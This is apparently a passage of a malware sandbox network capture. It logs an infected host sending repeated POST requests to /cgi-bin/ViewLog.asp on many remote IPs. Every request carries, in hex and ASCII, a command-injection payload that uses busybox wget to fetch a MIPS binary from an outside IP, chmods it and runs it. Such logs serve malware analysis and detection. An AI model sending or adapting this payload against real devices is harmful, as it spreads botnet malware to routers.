                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.838437080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:49.446402073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.406426907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.838392019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.702229977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              317192.168.2.135984694.46.169.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.871829987 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:41.066631079 CET1340INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:40 GMT
                                              Server: Apache
                                              Accept-Ranges: bytes
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                              Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              318192.168.2.133945062.109.58.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.285130978 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.469667912 CET165INHTTP/1.0 403 Access denied
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              319192.168.2.134804262.245.72.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.296519041 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              320192.168.2.134796694.180.253.1908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.326947927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:44.574342966 CET1171INHTTP/1.1 404
                                              Set-Cookie: JSESSIONID=1F7FAC3FA8138512AABBD8939626F918; Path=/; HttpOnly
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: POST, GET
                                              Access-Control-Max-Age: 3600
                                              Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,userId,token,Access-Control-Allow-Headers
                                              Access-Control-Allow-Credentials: true
                                              X-XSS-Protection: 1; mode=block
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 504
                                              Date: Thu, 23 Nov 2023 04:16:44 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 68 31 7b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 30 70 78 3b 0d 0a 09 7d 0d 0a 09 68 32 7b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 30 70 78 3b 0d 0a 09 7d 0d 0a 09 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 3c 68 32 3e 65 72 72 6f 72 20 50 61 67 65 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title></title><style>h1{text-align:center;font-size:150px;margin-top:200px;}h2{text-align:center;font-size:60px;margin-top:200px;}</style></head><body><h1>404</h1><h2>error Page</h2></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              321192.168.2.133617295.14.38.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.357275009 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:45.109220982 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              322192.168.2.136067894.121.64.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.553442955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              323192.168.2.133945262.109.58.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.653716087 CET163INHTTP/1.0 400 Bad Request
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              324192.168.2.133992031.136.104.1638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.737946033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:45.318447113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.470417023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.934448004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:53.542438984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.758460045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
